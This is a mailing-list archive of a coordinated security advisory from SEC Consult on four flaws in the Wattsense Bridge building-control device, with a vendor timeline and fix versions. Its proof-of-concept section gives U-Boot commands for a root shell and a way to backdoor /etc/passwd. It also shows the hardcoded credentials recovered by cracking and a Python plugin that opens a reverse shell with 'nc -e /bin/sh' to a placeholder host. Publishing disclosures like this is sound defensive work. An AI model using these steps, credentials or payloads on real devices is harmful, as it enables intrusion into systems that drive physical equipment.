| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3d1684cf-a299-46b7-85ad-b06b44950ea5@sec-consult.com>
Date: Tue, 11 Feb 2025 09:01:08 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20250211-0 :: Multiple vulnerabilities in
Wattsense Bridge
SEC Consult Vulnerability Lab Security Advisory < 20250211-0 >
=======================================================================
title: Multiple vulnerabilities
product: Wattsense - Wattsense Bridge
vulnerable version: Wattsense Bridge
* Hardware Revision: WSG-EU-SC-14-00, 20230801
* Firmware Revision: Wattsense (Wattsense minimal)
5.7.2 ws-box-v1.3
fixed version: Issue 2&3 >=6.4.1, Issue 4 >=6.1.0
CVE number: CVE-2025-26408, CVE-2025-26409, CVE-2025-26410
CVE-2025-26411
impact: high
homepage: https://www.wattsense.com
found: 2023-11-20
by: Constantin Schieber-Knöbl (Office Vienna)
Stefan Schweighofer (Office Vienna)
Steffen Robertz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Buildings in the EU are responsible for 40% of our energy consumption and
36% of greenhouse gas emissions.
At Wattsense, we believe that to reduce those hard-hitting numbers and
positively change our environment, we must bring technology, mostly reserved
for new or large facilities, to smaller and medium-sized buildings.
Wattsense gives property owners the power to make their buildings more
sustainable."
Source: https://www.wattsense.com/about
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.
Vulnerability overview/description:
-----------------------------------
For the vulnerabilities 1-4 the following impact arises, if one of these
vulnerabilities is successfully exploited.
An attacker with physical access to the device can control the measurements
and switching behavior of the device by e.g., installing a backdoor for
later remote access. Since the Wattsense Bridge can trigger actions on
physical devices, safety violations and physical damages are possible.
1) Access to JTAG Interface (CVE-2025-26408)
The JTAG interface can be accessed with physical access to the PCB.
After connecting to the interface, full access to the device is
possible. This enables an attacker to extract information, modify
and debug the device's firmware.
2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)
A serial interface can be accessed with physical access to the PCB. After
connecting to the interface, access to the bootloader is possible,
as well as a Linux login prompt. The bootloader access can be used to gain
a root shell on the device.
3) Weak Hardcoded Credentials (CVE-2025-26410)
The firmware of all devices contain the same hardcoded user and
root credentials. The user password can be easily recovered via password
cracking attempts. The recovered credentials can be used to log into
the device via the login shell that is exposed by the serial interface,
described in the previous vulnerability "2) Access to Bootloader and
Shell Over Serial Interface".
4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)
An authenticated attacker is able to use the Plugin Manager of the web
interface to upload malicious python files to the device. This enables an
attacker to gain remote root access to the device. An attacker needs a
valid user account on the Wattsense web interface, where valid Wattsense
Bridge devices are configured, to be able to conduct this attack.
Proof of concept:
-----------------
1) Access to JTAG Interface (CVE-2025-26408)
The unlocked JTAG interface is exposed on the stamp hole expansion interface
of the system on module (SoM) processing PCB (Myirtech MYC-Y6ULX) and is
documented in the related datasheet. By soldering the appropriate pins
(TMS, TCK, TDI, TDO, TRST) to the PCB, the JTAG port is accessible by an
adaptor. The MOD pin can be left unconnected and enables software debug
features when no high signal is provided with a pull-up.
The Segger J-Link PRO JTAG adaptor is used to connect. The debugging software
OpenOCD can then be used to manipulate and read the firmware. This grants an
attacker with physical access to the device full control of the device.
2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)
The serial interface on the Wattsense Bridge can be accessed by connecting to
the following pin header (GND, TX, RX) that is present on the PCB:
--------|
+-+ |
|o|GND |
|o|RX |
|o|TX |
+-+ |
Micro USB Port
|
A serial-USB adaptor (e.g., FT232 based board) can be used to access the
serial interface. The following settings on an arbitrary terminal-program
are necessary:
* Voltage: 3.3V
* Speed: 115200 Baud
* Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)
After a successful connection, the bootloader is available by pressing any
key at startup. With the resulting U-Boot command shell, the environment
variables of the boot process can be modified. This allows an attacker
to launch a root shell during the boot process:
=> setenv mmcargs "setenv bootargs console=${console},${baudrate} root=${mmcpath} ${mmcroot}
${raucslot} init=/bin/sh"
=> boot
An attacker is now able to remount the file system to be readable and writeable
in the root shell:
# mount -o remount, rw /
At this point an attacker can for example backdoor the device with a new root
user by appending a line to the /etc/passwd file. Now the boot environment
needs to be reset to the previous state. After starting the device, a Linux
login prompt is presented, where the newly created backdoor account can
then be used to login into the system.
3) Weak Hardcoded Credentials (CVE-2025-26410)
The firmware on all devices includes the same hardcoded user and root password
hash. The user password hash can easily be cracked with the password cracking
tool john:
$ john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cracked 1 password hash
No password hashes left to crack (see FAQ)
$ john --show shadow
wattsense:wattsense::0:99999:7:::
1 password hash cracked, 0 left
The user's password can then be used for example to also log into the system
as a normal user via the vulnerability described in "2) Access to Bootloader
and Shell Over Serial Interface".
4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)
The "Plugin Manager" feature of the Wattsense web interface allows an
authenticated attacker to upload malicious python files to the Wattsense
bridge. With the following python code it is possible to gain a remote root
shell on a targeted device:
from wattsense.azote import Plugin
import os
class WriteSetpoint (Plugin):
def __init__(self):
os.system("nc -e /bin/sh <remote_host> <remote_port>")
super().__init__()
def callback(self,variable,value,timestamp):
if variable == 'ERS_EYE_PRESENCE' and value == 1:
self.publish('MCLIMAT_SETPOINT', "0E18:1")
else:
self.publish('MCLIMAT_SETPOINT', "0E12:1")
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* Wattsense Bridge
- Hardware Revision: WSG-EU-SC-14-00, 20230801
- Firmware Revision: Wattsense (Wattsense minimal) 5.7.2 ws-box-v1.3
Vendor contact timeline:
------------------------
2024-05-15: Contacting vendor through support@...tsense.com
2024-05-15: The Wattsense team responded within one hour and the advisory was
provided to them thereafter.
2024-05-21: The Wattsense team gave an update that vulnerability 3 and 4
is already fixed and they are working on resolving the other
ones (1-2) as well. Issue 5 will be worked on afterwards when
access to the device is further blocked.
2024-05-22: Asking how to proceed with issue 5, if Wattsense is going to fix it or
the modem supplier.
2024-05-27: Vendor: no communication with the supplier yet, current focus is
blocking access to the system. We offer to contact the supplier,
Wattsense will do it in parallel as well. Removing issue 5 from this
advisory, creating a separate one.
2024-06-18: Contacting Wattsense regarding a direct contact for the supplier as they
are unresponsive.
2024-06-25: Vendor: only a distributor contact is available to them, they will look
into it. Furthermore, issue 2 is fixed now.
2024-07-12: Vendor: The devices will receive updates starting from 2024-07-15.
As some devices are not always connected, the vendor estimates that most
devices should be updated by the end of September 2024.
2024-11-13: Asking for more information about affected firmware versions and how to
proceed regarding the advisory release. No response.
2024-12-10: Asking for a status update.
2024-12-10: Vendor: Issue 1 is in the backlog. Issue 2 and issue 3 are fixed in
version >= 6.4.1.
2024-12-16: Asking regarding the CVE reservation for the described issues and planned
advisory, scheduling release for mid January; No response.
2025-02-04: Informing vendor that we will assign CVE and release the advisory shortly.
2025-02-11: Coordinated release of advisory.
Solution:
---------
The vendor communicated during initial contact that the following vulnerabilities
were already fixed or being worked on:
* Vulnerability 1: Vendor: Requires more attacker knowledge and higher physical access.
The device is meant to be installed at a restricted access physical
location. The issue will be put in the backlog of the Wattsense team.
* Vulnerability 2: fixed in recent FW versions BSP >= 6.4.1
* Vulnerability 3: User does not exist anymore in BSP >= 6.4.1
* Vulnerability 4: fixed in recent FW versions BSP >= 6.1.0
Workaround:
-----------
None
Advisory URL:
-------------
https://r.sec-consult.com/wattsense
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult
EOF C. Schieber-Knöbl, S. Schweighofer, S. Robertz / @2025
Download attachment "sec-consult-c-wattsense-02_bootloader.png" of type "image/png" (488528 bytes)
Download attachment "sec-consult-c-wattsense-01_accessjtag.png" of type "image/png" (703403 bytes)
Download attachment "smime.p7s" of type "application/pkcs7-signature" (4438 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists